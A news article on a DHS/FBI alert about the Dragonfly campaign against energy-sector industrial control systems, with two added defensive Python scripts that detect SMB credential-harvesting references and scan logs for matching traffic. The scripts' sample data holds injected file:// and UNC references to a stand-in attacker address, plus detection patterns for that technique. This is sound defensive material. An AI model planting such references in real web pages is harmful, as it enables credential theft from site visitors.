DHS, FBI Identify Tactics in Cyberattack Campaign Targeting Industrial Control Systems

The Department of Homeland Security (DHS) and Federal Bureau of Investigation (FBI) warned in an e-mail on October 20 that an ongoing cyberattack campaign has been targeting the nuclear, energy, and other critical infrastructure sectors since at least May 2017, with results ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict.

The federal agencies on October 20 also released a joint technical alert describing activity they attribute to “advanced persistent threat” actors. The report outlines indicators of compromise as well as technical details on the tactics, techniques, and procedures the threat actors used on compromised networks.

The alarm sounded by the DHS and FBI is serious and should be heeded, said Dana Tamir, vice president of Market Strategy for Indegy, a cybersecurity solutions and technology firm.

“This is the first time we are seeing such a widespread campaign that is specifically targeting industrial control systems (ICS) which are responsible for managing and controlling the physical processes in nuclear, water, aviation, and critical manufacturing sectors,” she told POWER on October 23.

The Dragonfly Threat

Security threats aimed at power companies have been on the rise and are growing more diverse, experts generally note. Following the unprecedented disruption of electric grid operations in Ukraine on December 23, 2015—an attack attributed to the use of BlackEnergy 3 malware—a second attack employing CrashOverride malware in December 2016 left portions of Kiev without power.

On October 10, cybersecurity firm FireEye reported its devices detected and blocked spear-phishing emails sent on September 22 to U.S. electric companies by threat actors “likely affiliated with the North Korean government.” But the firm reported that the activity was “early-stage reconnaissance, and not necessarily indicative of an imminent, disruptive cyber attack that might take months to prepare if it went undetected (judging from past experiences with other cyber threat groups).” It added that it had not observed suspected North Korean actors using any tool or method specifically designed to compromise or manipulate the ICS networks, concluding that the actors may not “have access to any such capability at this time.”

The joint analysis report by the DHS and FBI released on Friday, however, describes “distinct indicators and behaviors” of a potentially more disruptive cyberattack campaign, and it points specifically to Dragonfly, a group that has reportedly stepped up cyberattacks aimed at severely crippling operations in the European and North American energy sectors.

Few details are publicly available about what Dragonfly is, where the threat actors are based, and what motivates them. The DHS lists the threat under “reported Russian military and civilian intelligence services,” along with BlackEnergy, Energetic Bear, and Havex.

IT security firm Symantec in a September alert said that the group, which has been in operation since at least 2011, launched a renewed campaign, “Dragonfly 2.0,” in December 2015. The firm warned it has seen a “distinct increase in activity in 2017.”

Specific Operational Technology Targets

According to the DHS/FBI report, Dragonfly’s campaign comprises two distinct categories of victims: staging and intended targets.

“The initial victims [which the report refers to as “staging targets”] are peripheral organizations such as trusted third party suppliers with less secure networks,” the report says. “The threat actor uses the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims.”

It adds: “The ultimate objective of the cyber threat actors is to compromise organizational networks, which are referred to throughout this alert as ‘intended target.’”

Indegy cybersecurity expert Tamir on October 23 told POWER that the campaign appears to be specifically targeting operational technology (OT), and it illustrates “that attackers are intent on gathering very specific intelligence on operational networks and the technologies they can use to plan future attacks.”

The severity of such an attack cannot be overstated. Once inside an operational network, attackers have free rein, since ICS environments lack both authentication and encryption controls, she said.

“It is important to understand that ICS networks often lack security controls. Therefore, once an adversary gains access, there is no way to restrict their activities. This is because most of these systems were designed and implemented decades ago, before cyber-threats existed. As a result, these systems are very sensitive to such attacks and can be easily compromised if infiltrated,” she explained.

“In other words, every user has administrative privileges and can make engineering level changes to control devices that manage processes. Therefore, unless the organization has invested in monitoring tools that can detect anomalies and changes made to individual control devices, an attack would only be detected after damage begins to occur.”

Widespread Tactics

According to the DHS, the group’s tactics, techniques, and procedures outlined in the analysis were mapped to the Cyber Kill Chain framework developed by defense contractor Lockheed Martin. The framework breaks an intrusion into the sequence of stages (reconnaissance through actions on objectives) that threat actors must complete to achieve their goal, so that defenders can identify where a campaign can be detected or interrupted.

Dragonfly actors, it said, have so far employed a variety of tactics and techniques, including:

  • open-source reconnaissance
  • spear-phishing emails (from compromised legitimate accounts)
  • watering-hole domains
  • host-based exploitation
  • ICS infrastructure targeting
  • ongoing credential gathering.

Significantly, the report notes that the threat actors “appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity.”

Staging targets, or initial victims, already had preexisting relationships with many of the intended targets, and the threat actors are actively accessing publicly available information hosted on the networks those organizations operate. “DHS further assesses that threat actors are seeking to identify information pertaining to network and organizational design, as well as control system capabilities, within organizations,” it says.

This type of “open-source reconnaissance of their targets” is a common tactic used to prepare targeted spear-phishing attempts. However, DHS also warned that threat actors are actively seeking out operationally sensitive information that is available in innocuous materials on company websites. In one case, for example, a small photo of a control system on a publicly accessible human resources page could be expanded to reveal equipment models and status information in the background. Threat actors also seemed interested—but have so far failed to compromise—web-based remote access infrastructure, like websites, remote email access portals, and virtual private network connections.

Also notable is that the threat actors used a spear-phishing email campaign that differed from previously reported tactics. It used a generic contract agreement theme with the subject line “AGREEMENT & Confidential” and carried a generic PDF attachment titled “document.pdf”. The PDF itself was not malicious, but it prompted the user to click a shortened URL if the download did not begin automatically. That link then redirected users to a website that prompted them to retrieve a malicious file.

The report also warns that threat actors developed “watering holes” by compromising and altering the infrastructure of trusted organizations to reach intended targets. “Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure,” the report says. “Using a server message block (SMB) collection technique, the actors manipulated these websites by altering JavaScript and PHP files that redirect to an IP address on port 445 for credential harvesting.”

However, the actors more likely used “legitimate credentials” to access website content directly, it says.
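The alteration the report describes, editing JavaScript or PHP so that a page makes a visitor's browser request a resource from an attacker-controlled host over SMB (TCP/445), leaves a recognisable artifact in the page source: a `file://` URL or a UNC path pointing at an address outside the organization. The following script is an added example, not code from the DHS/FBI alert or from POWER, that scans a web root for such references so an operator of a suspected watering hole can find the injected lines. The file paths, page contents and the 192.0.2.10 address are constructed sample data (192.0.2.0/24 is an RFC 5737 documentation range standing in for an attacker server); only RFC 1918, loopback and link-local addresses are treated as internal, so documentation ranges classify as external.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# file://host/path URLs embedded in HTML/JS/PHP, and UNC paths \\host\share\...
# as they appear in page source (a JS string literal doubles the backslashes,
# which still matches because the pattern anchors on the last two).
FILE_URL_RE = re.compile(r'file://([A-Za-z0-9.\-]+)/[^\s"\'<>)]*', re.IGNORECASE)
UNC_RE = re.compile(r'\\\\([A-Za-z0-9.\-]+)\\[^\s"\'<>)]*')

# Address space treated as "ours". Documentation ranges such as 192.0.2.0/24
# are deliberately absent, so they classify as external below.
INTERNAL_NETS = [ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


@dataclass
class Finding:
    path: str        # web file the reference was found in
    host: str        # host the visitor's machine would contact over SMB
    reference: str   # the matched URL or UNC path
    verdict: str     # "external", "internal", or "hostname" (needs manual review)


def classify_host(host: str) -> str:
    """External IP literals are the watering-hole signature; names cannot be judged offline."""
    if host.lower() == "localhost":
        return "internal"
    try:
        addr = ip_address(host)
    except ValueError:
        return "hostname"
    return "internal" if any(addr in net for net in INTERNAL_NETS) else "external"


def scan_content(path: str, text: str) -> list:
    """Return every SMB-triggering reference found in one file's source."""
    findings = []
    for pattern in (FILE_URL_RE, UNC_RE):
        for m in pattern.finditer(text):
            host = m.group(1)
            findings.append(Finding(path, host, m.group(0), classify_host(host)))
    return findings


def scan_site(files: dict) -> list:
    """files maps relative path -> contents (read from the web root in real use)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_content(path, text))
    return findings


def external_hosts(findings: list) -> list:
    return sorted({f.host for f in findings if f.verdict == "external"})


# Constructed sample web root, not a real site. 192.0.2.10 is an RFC 5737
# documentation address standing in for an attacker-controlled server.
SAMPLE_SITE = {
    "index.html": '<html><body><img src="/img/logo.png"></body></html>',
    "news.html": ('<html><body><h1>Plant update</h1>'
                  '<img src="file://192.0.2.10/main_logo.png" width="1" height="1">'
                  '</body></html>'),
    # JS string literal: the source holds \\\\host\\share, an escaped UNC path
    "js/menu.js": r"var logo = '\\\\192.0.2.10\\share\\icon.png';",
    # Reference to an internal file server: common and legitimate on intranets
    "intranet.php": r'<?php echo "<link rel=\"icon\" href=\"file://10.0.0.5/icons/fav.ico\">"; ?>',
    "about.html": '<img src="file://fileserver.corp.example/share/logo.png">',
}

if __name__ == "__main__":
    results = scan_site(SAMPLE_SITE)
    for f in results:
        print(f"{f.verdict:8} {f.path:14} {f.host:26} {f.reference}")
    print("external hosts:", external_hosts(results))
```

Anything reported as "external" is the injected reference to remove and the address to block at the perimeter; "hostname" findings need a lookup against the organization's own DNS before they can be cleared.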

Highly Vulnerable Systems

According to Tamir, while the threat is widespread and unprecedented, “basic monitoring and auditing capabilities that are commonplace in IT networks are sorely lacking in industrial networks.”

Other experts agree. Some, like Michael Assante, ICS/SCADA lead for the SANS Institute, a cybersecurity training firm, go as far as to warn that risks to OT are so real, “it’s dangerous and perhaps even negligent for business leaders to ignore it,” he said on October 24.

On October 24, meanwhile, CyberX, a firm that provides an industrial cybersecurity platform for continuously reducing ICS risk, released a report analyzing data from 375 representative OT networks worldwide across all sectors—including energy and utilities, manufacturing, pharmaceuticals, chemicals, and oil and gas. It found that a third of industrial sites were connected to the internet. More than 75% of sites had obsolete Windows systems like Windows XP and 2000, and nearly three of five sites had plain-text passwords traversing their control networks. More worryingly, more than half of the sites did not have anti-virus protection; another 50% had at least one unknown or rogue device; 20% had wireless access points; and 82% ran remote management protocols.

The DHS/FBI report acknowledges these gaps and recommends measures and general best practices to thwart a Dragonfly attack in a long list. [For more, see “General Best Practices to Thwart a Dragonfly Cyberattack.”]

Essentially, the federal agencies’ report recommends that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. It also recommends users and administrators actively work to detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the report’s appendix to logs.
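The report's advice to compare the listed IP addresses and domain names against logs, together with the port-445 behaviour noted in the watering-hole section, can be turned into a small triage script. The following is an added example and not the agencies' tooling: the indicator values, the space-separated key=value log format and the log lines are all constructed for illustration, and the real indicators are in the alert's appendix. It matches destination IPs and hostnames (including subdomains of a listed domain) against the indicator list and, independently of that list, flags any SMB connection (TCP/445) to a non-internal address, which is the outbound behaviour the injected watering-hole references provoke.

```python
import ipaddress

# Constructed indicators for illustration only. The real lists are in the
# alert's appendix; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.
IOC_IPS = {"192.0.2.10", "198.51.100.23"}
IOC_DOMAINS = {"bad-example.test"}

# RFC 1918, loopback and link-local: anything else is treated as outside the
# organization (ipaddress.is_global would wrongly exclude documentation ranges).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed firewall/proxy lines in a simplified key=value format. Line 6 is
# the instructive one: no indicator match, but SMB leaving the network.
SAMPLE_LOGS = [
    "ts=2017-10-21T09:12:03Z src=10.1.4.22 dst=192.0.2.10 dport=445 proto=tcp",
    "ts=2017-10-21T09:12:05Z src=10.1.4.22 dst=10.1.1.5 dport=445 proto=tcp",
    "ts=2017-10-21T09:13:10Z src=10.1.4.31 dst=203.0.113.7 dport=443 proto=tcp host=update.bad-example.test",
    "ts=2017-10-21T09:14:00Z src=10.1.4.31 dst=203.0.113.8 dport=443 proto=tcp host=www.example.com",
    "ts=2017-10-21T09:15:42Z src=10.1.9.2 dst=198.51.100.23 dport=80 proto=tcp host=198.51.100.23",
    "ts=2017-10-21T09:16:00Z src=10.1.9.2 dst=203.0.113.9 dport=445 proto=tcp",
]


def parse_line(line: str) -> dict:
    """key=value fields separated by whitespace; tokens without '=' are skipped."""
    fields = {}
    for token in line.split():
        if "=" in token:
            k, v = token.split("=", 1)
            fields[k] = v
    return fields


def is_internal(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def domain_matches(host: str, ioc_domains) -> str:
    """Return the indicator that host equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    for d in ioc_domains:
        d = d.lower()
        if host == d or host.endswith("." + d):
            return d
    return None


def analyze(lines, ioc_ips, ioc_domains) -> dict:
    """1-based line numbers of indicator hits and of external SMB connections."""
    ioc_hits = []    # (line_no, field, indicator)
    smb_egress = []  # line_no
    for n, line in enumerate(lines, start=1):
        f = parse_line(line)
        dst, host = f.get("dst"), f.get("host")
        if dst in ioc_ips:
            ioc_hits.append((n, "dst", dst))
        elif host in ioc_ips:          # proxy logs may carry the IP as the host
            ioc_hits.append((n, "host", host))
        elif host:
            hit = domain_matches(host, ioc_domains)
            if hit:
                ioc_hits.append((n, "host", hit))
        # Behavioural rule: SMB should never leave the organization's address space.
        if f.get("dport") == "445" and f.get("proto", "tcp") == "tcp" and dst and not is_internal(dst):
            smb_egress.append(n)
    return {"ioc_hits": ioc_hits, "smb_egress": smb_egress}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOGS, IOC_IPS, IOC_DOMAINS)
    for n, field, indicator in report["ioc_hits"]:
        print(f"line {n}: {field} matched indicator {indicator}")
    for n in report["smb_egress"]:
        print(f"line {n}: outbound SMB to external address")
```

The two checks are kept separate on purpose: the indicator list only catches infrastructure the agencies already know about, while the outbound-445 rule catches the same technique when it is hosted elsewhere, as line 6 shows. Blocking TCP/445 at the perimeter removes that whole class of credential-harvesting request.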

The DHS also specifically instructs anyone who identifies the use of tools or techniques it identified to report them to the DHS or law enforcement immediately at NCCICcustomerservice@hq.dhs.gov or 888-282-0870.

—Sonal Patel is a POWER associate editor (@sonalcpatel, @POWERmagazine)